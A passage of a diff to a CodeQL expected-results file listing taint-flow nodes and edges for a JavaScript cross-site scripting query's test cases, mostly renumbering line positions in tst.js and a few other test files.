ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... 
search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:9:28:9:30 | loc | semmle.label | loc | | typeahead.js:10:16:10:18 | loc | semmle.label | loc | | typeahead.js:20:13:20:45 | target | semmle.label | target | @@ -831,8 +831,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | jwt.js:4:36:4:39 | data | jwt.js:5:30:5:33 | data | provenance | | | jwt.js:5:9:5:34 | decoded | jwt.js:6:14:6:20 | decoded | provenance | | | jwt.js:5:19:5:34 | jwt_decode(data) | jwt.js:5:9:5:34 | decoded | provenance | | 
@@ -943,8 +943,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | 
@@ -954,8 +954,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | 
